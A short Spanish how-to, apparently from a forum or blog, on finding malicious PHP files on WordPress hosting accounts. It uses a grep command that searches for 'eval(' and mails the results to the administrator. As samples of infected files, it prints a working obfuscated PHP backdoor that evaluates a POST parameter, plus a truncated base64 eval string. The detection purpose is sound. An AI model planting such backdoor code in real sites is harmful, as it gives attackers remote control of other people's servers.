Es muy común que los sitios son atacados por hackers modificando o añadiendo archivos malignos (infectados), principalmente sitios elaborador con wordpress
Este comando te ayuda a detectar esos archivos, lo tienes que ejecutar por shell (ssh)
grep -R 'eval(' /home3/m*/public_html/* | grep -v 'Binary file' | grep -v '.css:' | grep -v '.js' | grep -v retriev |grep -v evalua | grep -v revalida | grep -v jquery | grep -v '.po:' | grep -v doubleval | grep -v 'INSTR(LCASE(' | grep -v '(strpos(strtolower($entry' | grep -v PCLZIP | grep -v 'INSTR(' > /root/lista.txt && cat /root/lista.txt && cat /root/lista.txt | mail -s "Backup" -a /root/lista.txt tucorreo@algo.com
rojo remplazar
azul remplazar con instrucciones
instrucciones azul
/home /home2 /home3 es la unidad de disco a escanear
en el ejemplo esta
/home3/m* = disco 3 todos los usuarios cpanel que comiencen con M
/home3/medix = disco 3 escanear al usuario medix
/home3/* = disco 3 todos los usuarios
/home2/* = disco 2 todos los usuarios
/home/* = disco 1 todos los usuarios
etc...
que hace el comando
Busca todos los archivos que contengan el comando eval , ese es el comando mas utilizado por atacantes, en un 99%; PD no siempre entran por este comando pero casi siempre lo usan para una vez infectado atacar al sitio o hacer sus cosas.
luego perfecciono el comando con otros tipos de ataques o amenazas
Aclaraciones del resultado, este resultado muestra los archivos con ese comando, no significa que estén infectados , intente eliminar la mayor cantidad de usos buenos
Típicos archivos maliciosos
caracteres raros
tiendadebuceo/history.php:<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q64cbee'])){eval(${$s20}['q64cbee']);}?><?php
una cadena de muchas letras y numeros acompañados de un eval
eval(base64decode("mnAISDNQmnmxsa98hjn98lkASDumw3idmnaSDYB)ebiSAD867b3iu97ASDFNBIAJdn783hkjABSND783b2kjbnSAkjdnjuahsd3wb98HJb7983bkashdbashjdbajshbda....